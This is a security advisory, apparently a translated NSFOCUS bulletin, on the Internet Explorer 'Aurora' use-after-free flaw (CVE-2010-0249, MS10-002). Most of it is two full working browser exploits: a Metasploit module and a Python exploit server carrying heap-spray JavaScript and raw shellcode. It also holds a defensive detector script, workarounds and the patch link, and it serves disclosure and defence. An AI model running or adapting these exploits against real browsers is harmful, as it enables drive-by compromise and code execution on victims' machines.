Microsoft IE Invalid Event Handling Memory Corruption Vulnerability (MS10-002)

Published: 2010-01-14
Updated: 2010-01-21

Affected systems:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Description:
BUGTRAQ ID: 37815
CVE ID: CVE-2010-0249

Microsoft IE is the web browser bundled with Microsoft's Windows operating system.

IE contains a memory corruption vulnerability in its handling of invalid event operations: after an object is created, its reference count is not incremented accordingly, so a malicious sequence of object operations can leave a pointer referring to memory that has been freed and reused. A remote attacker could exploit this by luring a user to a malicious web page, corrupting memory and executing arbitrary instructions on the user's system.

This is a 0-day vulnerability confirmed to affect IE 6/7/8. It has already been used to attack the networks of several large companies, and now that technical details and working exploit code are public it is very likely to be used in drive-by download ("挂马") attacks. Microsoft has published a security advisory with workarounds but has not yet provided a patch; it is strongly recommended to apply the measures described in the workarounds.

<*Source: Microsoft
  
  Links: http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx
        http://secunia.com/advisories/38209/
        http://www.kb.cert.org/vuls/id/492515
        http://extraexploit.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249.html
        http://blogs.technet.com/msrc/archive/2010/01/17/further-insight-into-security-advisory-979352-and-the-threat-landscape.aspx
        http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-021A.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!

##
# $Id: ie_aurora.rb 8140 2010-01-16 01:00:01Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "6.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :vuln_test  => nil, # no way to test without just trying it
    })


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
            'Description'    => %q{
                This module exploits a memory corruption flaw in Internet Explorer. This
            flaw was found in the wild and was a key component of the "Operation Aurora"
            attacks that lead to the compromise of a number of high profile companies. The
            exploit code is a direct port of the public sample published to the Wepawet
            malware analysis site. The technique used by this module is currently identical
            to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'unknown',
                    'hdm'      # Metasploit port
                ],
            'Version'        => '$Revision: 8140 $',
            'References'     =>
                [
                    ['CVE', '2010-0249'],
                    ['OSVDB', '61697'],
                    ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                    ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00",
                    'Compat'   =>
                        {
                            'ConnectionType' => '-find',
                        },
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { }],
                ],
            'DisclosureDate' => 'Jan 14 2009', # wepawet sample
            'DefaultTarget'  => 0))
    end

    def on_request_uri(cli, request)

        if (request.uri.match(/\.gif/i))
            data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
            send_response(cli, data, { 'Content-Type' => 'image/gif' })
            return
        end

        var_memory    = rand_text_alpha(rand(100) + 1)
        var_boom      = rand_text_alpha(rand(100) + 1)
        var_x1        = rand_text_alpha(rand(100) + 1)
        var_e1        = rand_text_alpha(rand(100) + 1)
        var_e2        = rand_text_alpha(rand(100) + 1)

        var_comment   = rand_text_alpha(rand(100) + 1);
        var_abc       = rand_text_alpha(3);

        var_ev1       = rand_text_alpha(rand(100) + 1)
        var_ev2       = rand_text_alpha(rand(100) + 1)
        var_sp1       = rand_text_alpha(rand(100) + 1)

        var_unescape  = rand_text_alpha(rand(100) + 1)
        var_shellcode = rand_text_alpha(rand(100) + 1)
        var_spray     = rand_text_alpha(rand(100) + 1)
        var_start     = rand_text_alpha(rand(100) + 1)
        var_i         = rand_text_alpha(rand(100) + 1)

        rand_html     = rand_text_english(rand(400) + 500)

        html = %Q|<html>
<head>
<script>

    var #{var_comment} = "COMMENT";

    var #{var_x1} = new Array();
    for (i = 0; i < 200; i ++ ){
       #{var_x1}[i] = document.createElement(#{var_comment});
       #{var_x1}[i].data = "#{var_abc}";
    };

    var #{var_e1} = null;

    var #{var_memory} = new Array();
    var #{var_unescape} = unescape;

    function #{var_boom}() {

        var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

        var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

        do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

        for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
    }

    function #{var_ev1}(evt){
        #{var_boom}();
        #{var_e1} = document.createEventObject(evt);
        document.getElementById("#{var_sp1}").innerHTML = "";
        window.setInterval(#{var_ev2}, 50);
    }

    function #{var_ev2}(){
      p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
      for (i = 0; i < #{var_x1}.length; i ++ ){
          #{var_x1}[i].data = p;
      }

      var t = #{var_e1}.srcElement;
    }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
        |

        print_status("Sending #{self.name} to client #{cli.peerhost}")
        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

        # Handle the payload
        handler(cli)
    end
end

http://www.exploit-db.com/exploits/11167

# Title: Internet Explorer Aurora Exploit
# EDB-ID: 11167
# CVE-ID: (CVE-2010-0249)
# OSVDB-ID: ()
# Author: Ahmed Obied
# Published: 2010-01-17
# Verified: yes
#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   This program acts as a web server that generates an exploit to
#   target a vulnerability (CVE-2010-0249) in Internet Explorer.
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2.
#   The exploit's payload spawns the calculator.
#
#   Usage  : python ie_aurora.py [port number]
#  
  
import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
                
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
        payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
        payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
        payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
        payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
        payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
        payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
        payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
        payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
        payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
        payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)
    
    def get_exploit(self):
        exploit = '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);      
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true;  
            }
            
            if (check()) {
                initialize();
                spray_heap();              
            }
            else
                window.location = 'about:blank'
                
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>      
        </body>
        </html>
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit

    def get_image(self):
        content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':    
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        except:
            print '[*] Error : an error has occured while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)
            
                        
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                print '[-] Exiting ...'
        except socket.error:
            print '[*] Error : a socket error has occurred'
        sys.exit(-1)  
    except ValueError:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()
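Both samples above share the same script shape: an array of COMMENT elements, a spray string doubled onto itself until it is huge, an event object kept alive while the element that produced it is freed through innerHTML = "", and a final srcElement read. As an added defender-side example (not part of the advisory or of either exploit), the following Python script flags pages that carry those indicators and decodes the exploit's %uXXXX units back into the bytes they spray; the two sample pages are constructed for the test and the <PAYLOAD> marker is a placeholder.

```python
import re
from typing import Dict

# Constructed sample (not code from the page): the script shape both exploits above share.
SAMPLE_AURORA = r'''<script>
var x = new Array();
for (i = 0; i < 200; i++) { x[i] = document.createElement("COMMENT"); }
function boom() {
  var sc = unescape("<PAYLOAD>");
  var spray = unescape("%u0c0d%u0c0d");
  do { spray += spray } while (spray.length < 0xd0000);
  for (i = 0; i < 150; i++) mem[i] = spray + sc;
}
function ev1(evt) {
  boom(); e1 = document.createEventObject(evt);
  document.getElementById("sp1").innerHTML = "";
  window.setInterval(ev2, 50);
}
function ev2() { for (i = 0; i < x.length; i++) x[i].data = p; var t = e1.srcElement; }
</script>'''

# Constructed benign page: legitimate unescape and createElement use, no spray or event reuse.
SAMPLE_BENIGN = '<script>var s = unescape("%20hi"); document.body.appendChild(document.createElement("div"));</script>'

def decode_percent_u(s: str) -> bytes:
    """Inverse of the exploit's %uXXXX encoding: each unit becomes two little-endian bytes."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in re.findall(r"%u([0-9a-fA-F]{4})", s))

def aurora_indicators(html: str) -> Dict[str, bool]:
    """Static indicators of the Aurora pattern; each is weak alone, together they are telling."""
    return {
        # sled units 0x0c0d / 0x0a0a handed to unescape (the values used by both samples)
        "sled_unescape": bool(re.search(r"""unescape\(\s*["']%u0[ca]0[da]""", html)),
        # a string doubled onto itself until it is huge: the spray growth loop
        "string_doubling": bool(re.search(r"\b(\w+)\s*\+=\s*\1\b", html)),
        # an array of COMMENT elements whose .data is later overwritten
        "comment_elements": '"COMMENT"' in html and "createElement(" in html,
        # event object kept alive, its element freed through innerHTML = "", then srcElement read
        "event_reuse": "createEventObject(" in html
                       and bool(re.search(r"""innerHTML\s*=\s*["']{2}""", html))
                       and ".srcElement" in html,
    }

def is_aurora_like(html: str, threshold: int = 3) -> bool:
    """Flag a page when at least `threshold` of the four indicators fire."""
    return sum(aurora_indicators(html).values()) >= threshold

if __name__ == "__main__":
    print(aurora_indicators(SAMPLE_AURORA), is_aurora_like(SAMPLE_AURORA))
```

Run it over the script portion of a captured page; the threshold keeps a single legitimate unescape or createElement call from triggering an alert.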

Recommendations:
Workarounds:

* Enable DEP for Internet Explorer 6 SP2 or Internet Explorer 7.

  Microsoft provides an automated tool that enables DEP for IE 6/7; download it from:
  http://go.microsoft.com/?linkid=9668626

* Configure Internet Explorer to prompt before running ActiveX controls and Active Scripting in the Internet and Local intranet security zones.
* Set the Internet and Local intranet security zone settings to "High" so that you are prompted before ActiveX controls and Active Scripting run in those zones.

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS10-002) and the corresponding patch:
MS10-002: Cumulative Security Update for Internet Explorer (978207)
Link: http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.